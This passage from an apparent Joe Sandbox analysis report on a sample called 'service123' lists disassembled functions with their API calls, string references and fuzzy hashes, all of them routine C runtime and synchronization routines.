Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string::append
API String ID: 39653677-3811946249
Opcode ID: 569dcfdbe47673eb9158d60c553e6cf04441fb0bc287a494b03333fd33ee25bf
Instruction ID: 0cd148d571c0aa9e1d29c7babefd1cf0f530589499d0d5002d1f2c92803bb120
Opcode Fuzzy Hash: 569dcfdbe47673eb9158d60c553e6cf04441fb0bc287a494b03333fd33ee25bf
Instruction Fuzzy Hash: 5BA15BB5A04204DFCB00EF69C5846AEBBF5FF89314F15856DE8989B704D734E889CB92

Function 6CA3B2D0 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

memmove.MSVCRT(00000000,?,?,6CA3997F), ref: 6CA3B336
memcpy.MSVCRT(?,?,?,?,?,?,6CA3997F), ref: 6CA3B3A1
memcpy.MSVCRT(00000000,?,?,6CA3997F), ref: 6CA3B3E8

Strings

basic_string::assign, xrefs: 6CA3B403

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: 6a17fd4ef7cac67ec6930d127eb0a6837ce77eb0366908f635badc6a590f04e2
Instruction ID: ed697dc484b21c4537ae994ee369eefa7e7611aca198d5493ff9f5609bdbdb61
Opcode Fuzzy Hash: 6a17fd4ef7cac67ec6930d127eb0a6837ce77eb0366908f635badc6a590f04e2
Instruction Fuzzy Hash: 0E519B71B0AB218BD704DF29E59465EF7E2FF95308B14962DE499CBB14E330D885CB82

Function 6CA44410 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6CA44471
memcpy.MSVCRT ref: 6CA444DF
memcpy.MSVCRT ref: 6CA44518

Strings

basic_string::assign, xrefs: 6CA44534

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: db3513534cc24484fb692f7695342f67cc327cddcf92252e8c851f3cced77abb
Instruction ID: e53a898493daaa374477c847e7d21ac8d86a643818baa0f01c95c11967abd0de
Opcode Fuzzy Hash: db3513534cc24484fb692f7695342f67cc327cddcf92252e8c851f3cced77abb
Instruction Fuzzy Hash: 4351BC71B0A6118FDB10DF2DD58461AFBE5BF96308F15CA6DE4948B718E730D889CB82

Function 6C9FE980 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 127stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C9FE9AA
wcslen.MSVCRT ref: 6C9FEA1A

Strings

basic_string: construction from null is not valid, xrefs: 6C9FE9E2, 6C9FEA52, 6C9FEAC2

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: strlenwcslen
String ID: basic_string: construction from null is not valid
API String ID: 803329031-2991274800
Opcode ID: efd8701af842815228a6109ca5dc3c7f8ad3c1e6ef299b479d8058e82219052e
Instruction ID: ee7465235ca07b50f72add94ca3b2b2952398282f24b837cb5571d027f2f7b7a
Opcode Fuzzy Hash: efd8701af842815228a6109ca5dc3c7f8ad3c1e6ef299b479d8058e82219052e
Instruction Fuzzy Hash: C8419DF1A056148FCB00FF2CD58188ABBE5BF59214F164979E8858B314E331D99ACBE2

Function 6C9FE581 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C9FE5AD
strlen.MSVCRT ref: 6C9FE5FD

Strings

basic_string: construction from null is not valid, xrefs: 6C9FE5CF, 6C9FE61F, 6C9FE66F

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid
API String ID: 39653677-2991274800
Opcode ID: f0db332caed800a31bd17263a354de781977f2bdc650f5516a6889953c6c3fe2
Instruction ID: 057a877e1e0843abb590f091cb61c6806b200204d7b534fdf9c947fbe9d7a886
Opcode Fuzzy Hash: f0db332caed800a31bd17263a354de781977f2bdc650f5516a6889953c6c3fe2
Instruction Fuzzy Hash: AB3188B15156148FCB10BF2CD585499B7E8BF15614B06486DE8849F711D331DC8ACB92

Function 00797C40 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 00797C92
MultiByteToWideChar.KERNEL32 ref: 00797CD5

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 4764079b2d50045ce6b27b205c2d90e782b1288821c414e0d751f3086e901753
Instruction ID: 9e5a90abffe830f24b6d60e576a7b1de6931e49444a8c9bb23a9688e5e273a02
Opcode Fuzzy Hash: 4764079b2d50045ce6b27b205c2d90e782b1288821c414e0d751f3086e901753
Instruction Fuzzy Hash: 1C31F7B061D3418FDB14DF28E58466ABBF0BF86314F04891EE8948B350E77AD849CB93

Function 6C9E9660 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 6C9E96B2
MultiByteToWideChar.KERNEL32 ref: 6C9E96F5

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 2de4c0909d975daf446e7ed8750942759f8d086a12fed0bffb96d900127a0898
Instruction ID: 6bdb54a7a59fad7cf1e57b364398c8b84e77e7db1732b28093a35e4227bc10b6
Opcode Fuzzy Hash: 2de4c0909d975daf446e7ed8750942759f8d086a12fed0bffb96d900127a0898
Instruction Fuzzy Hash: 183137B05093418FD701CF2AE18438ABBF4BF9A718F11891DE8D48B351E3B6D949CB42

Function 6C9DF511 Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C9DF5C1

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: 0994614bdf63ceb38bdcd201737e156c46355bf733bca1e4d0e6e92512ed3624
Instruction ID: f1d918c4435a973c82e7c6a14500344a7cb41c923ef3ce44e9f207a215093af8
Opcode Fuzzy Hash: 0994614bdf63ceb38bdcd201737e156c46355bf733bca1e4d0e6e92512ed3624
Instruction Fuzzy Hash: 30416A70A097028FDB18DF69E58571A7BF4BB4631CF16C21CE8A89B654D330E406CF92

Function 6C9DF6B0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C9DF751

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: 947826fdb86a31bd7684a2d57b06a0a4f47ebaad6c4b00cce0f2b2e02a4a3d4d
Instruction ID: 56f7132c2fb89539d0bb6b46c5b32fbb458c1ba5e2b3d57d9cce11b18840247b
Opcode Fuzzy Hash: 947826fdb86a31bd7684a2d57b06a0a4f47ebaad6c4b00cce0f2b2e02a4a3d4d
Instruction Fuzzy Hash: 6B318B70A057028FEB089F6AE5857467BF0FB4631CF16C25DE8A89B694D331E446CF92

Function 6C9DF9D1 Relevance: 6.1, APIs: 4, Instructions: 81synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C9DFA72
CreateSemaphoreW.KERNEL32 ref: 6C9DFAB7
WaitForSingleObject.KERNEL32 ref: 6C9DFB00

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: 33a459ea57491923bb66bb35716a4a1d5d2ddb79128d7127f98368c24caff476
Instruction ID: 48ee09d110f4a132ae92107b052793d8742170043cd3d119d7ea8cb03c4d2b91
Opcode Fuzzy Hash: 33a459ea57491923bb66bb35716a4a1d5d2ddb79128d7127f98368c24caff476
Instruction Fuzzy Hash: 8F313970A097028FDB18DF6DE58570A7BF4BB46318F05C65DE8A99B284E334E506CF92

Function 6C9DFB60 Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C9DFBF2
CreateSemaphoreW.KERNEL32 ref: 6C9DFC37
WaitForSingleObject.KERNEL32 ref: 6C9DFC80

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: 385ed4cce443e91ebe6eb5469087addf080100a0ac3d30069ab173db64700212
Instruction ID: 0daa126538ad63fe97a52d8fce2cadba134ca2a3cb78b2abbd487852b11d8031
Opcode Fuzzy Hash: 385ed4cce443e91ebe6eb5469087addf080100a0ac3d30069ab173db64700212
Instruction Fuzzy Hash: C1311B70A097028FDB089F39E6857067BF4BB46358F15C25CECA89B284D335E456CF92

Function 6C9D55A8 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C9D72FE

Strings

{parm#, xrefs: 6C9D72D9
}, xrefs: 6C9D7392
this, xrefs: 6C9D55B3

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: strlen
String ID: this${parm#$}
API String ID: 39653677-3278767634
Opcode ID: 8f40380c05ffb6367f370d14058694faae131799c34d25219aa2606d7045b0a0
Instruction ID: e79a861b05896bd410ab3fa73a143dd6918a09cff0c8ba71bffaa8d11ebebeec
Opcode Fuzzy Hash: 8f40380c05ffb6367f370d14058694faae131799c34d25219aa2606d7045b0a0
Instruction Fuzzy Hash: C8218071509742CFD7118F28D0843E9BBA1AFA2304F1AC5BEDCC85FA0AD375E4858BA1

Function 00791001 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 0079106B
__p__fmode.MSVCRT ref: 00791070
__p__commode.MSVCRT ref: 0079107D

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID: __p__commode__p__fmode__set_app_type
String ID:
API String ID: 3338496922-0
Opcode ID: 9033569cfa07751702af9d04d26aa22ffbb2f7548699b354af59b4837524a913
Instruction ID: b88885508c2b571cff7b21f715e69148d80911b49ee7c7496b02d2243ea244da
Opcode Fuzzy Hash: 9033569cfa07751702af9d04d26aa22ffbb2f7548699b354af59b4837524a913
Instruction Fuzzy Hash: 90215C70610203CBCB24AF2DE95936533B1BB00344FD4866AC4584B256E77F98E7DB95

Function 6CA49F70 Relevance: 6.0, APIs: 4, Instructions: 30stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6CA49F85
strlen.MSVCRT ref: 6CA49F8F
memcpy.MSVCRT ref: 6CA49FB8
setlocale.MSVCRT ref: 6CA49FCC

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: 9d561bc5d272a1eb2a181295eb6b47228b105e83d2e0587d10cbb0cc9c380437
Instruction ID: 803a93c280addd75d2c536583d97ee6497cc379a3feecaec0ea02b4d4e0b13b6
Opcode Fuzzy Hash: 9d561bc5d272a1eb2a181295eb6b47228b105e83d2e0587d10cbb0cc9c380437
Instruction Fuzzy Hash: E4F03AB15093219AD7007F68A5453AFBBE8EFA4684F028D1DE4C88B710E774C488CB92

Function 00794558 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

u, xrefs: 00794596
@, xrefs: 00794647

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID:
String ID: @$u
API String ID: 0-1583100103
Opcode ID: 5dfdb14eaa1a0d5b667d523dfec2748c578a70f67753733cee7762a0a75dcf86
Instruction ID: f855995fb7e4cd9bd5e2c6a09522eea06d9d100ad230095658a5aa8d5f5962ea
Opcode Fuzzy Hash: 5dfdb14eaa1a0d5b667d523dfec2748c578a70f67753733cee7762a0a75dcf86
Instruction Fuzzy Hash: 05A18175608391CBCF30CF24E090BAAB7E1BB85318F158A1DE8D897351D739D946DB82

Function 6C9E4C28 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

u, xrefs: 6C9E4C66
@, xrefs: 6C9E4D17

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID: @$u
API String ID: 0-1583100103
Opcode ID: c0f7dff7f0c02d2e87b3fb186c40ccb3fbc9b76e4f9493e07f4e603911454138
Instruction ID: a92db03d0d83c5b000addf9be57495a5f82d62f623f6d0ec2b81e97ba891dcc7
Opcode Fuzzy Hash: c0f7dff7f0c02d2e87b3fb186c40ccb3fbc9b76e4f9493e07f4e603911454138
Instruction Fuzzy Hash: C4A17C7160C396CBD722CF65C09039ABBE5BFA9318F148A1DE8D88B751D734D549CB82

Function 00794C21 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00794DBE

Part of subcall function 00792830: fputc.MSVCRT ref: 007928F8

Strings

(null), xrefs: 00794C27
@, xrefs: 00794647

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID: fputcwcslen
String ID: (null)$@
API String ID: 1336801768-1380778734
Opcode ID: 3c8a5287b7655443f68ed36a736cdc0bf210665103f2da6abbe4394cb9ec95f5
Instruction ID: 36596ff17b77562093a348fa3db2b4fa626e89cc9d0c44e826c87af756389d3a
Opcode Fuzzy Hash: 3c8a5287b7655443f68ed36a736cdc0bf210665103f2da6abbe4394cb9ec95f5
Instruction Fuzzy Hash: 679190756083918BDF318F24E090BAABBE1BF85718F158A1DD8D897342D739D906DB82

Function 6C9E52F1 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C9E548E

Part of subcall function 6C9E2F00: fputc.MSVCRT ref: 6C9E2FC8

Strings

@, xrefs: 6C9E4D17
(null), xrefs: 6C9E52F7

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: fputcwcslen
String ID: (null)$@
API String ID: 1336801768-1380778734
Opcode ID: 5c15d51876e5be2ef1ab82431437faceae3aad26086e436a1e30dd716b27a176
Instruction ID: 8b6b7b563760f7f52f74b2351838d87b1d2c47910701ab52c2ebd4f7c6f5634f
Opcode Fuzzy Hash: 5c15d51876e5be2ef1ab82431437faceae3aad26086e436a1e30dd716b27a176
Instruction Fuzzy Hash: CA91AE7160C3958BD7228F64C09039ABBE5BFA9318F158A1DE8DC8B741D735D90ACB82

Function 6CA65DB0 Relevance: 5.4, APIs: 4, Instructions: 369stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6CA65DEA
wcslen.MSVCRT ref: 6CA65E7C
wcslen.MSVCRT ref: 6CA65F0E
strlen.MSVCRT ref: 6CA65FA0

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: 3cfeed352ca786b2c51c38211ade1807b0e4c2ae51a34c17a394faed8b12cff9
Instruction ID: 519a19d5c8cdf13051b0b12898f052421c2fb337ec819b5b3acb915b61443123
Opcode Fuzzy Hash: 3cfeed352ca786b2c51c38211ade1807b0e4c2ae51a34c17a394faed8b12cff9
Instruction Fuzzy Hash: 11F16EB0A056068FCB00DFADC1849AEFBF1FF44314B158629E895CBB55E735E986CB81

Function 6CA655D0 Relevance: 5.4, APIs: 4, Instructions: 369stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6CA6560A
wcslen.MSVCRT ref: 6CA6569C
wcslen.MSVCRT ref: 6CA6572E
strlen.MSVCRT ref: 6CA657C0

Memory Dump Source

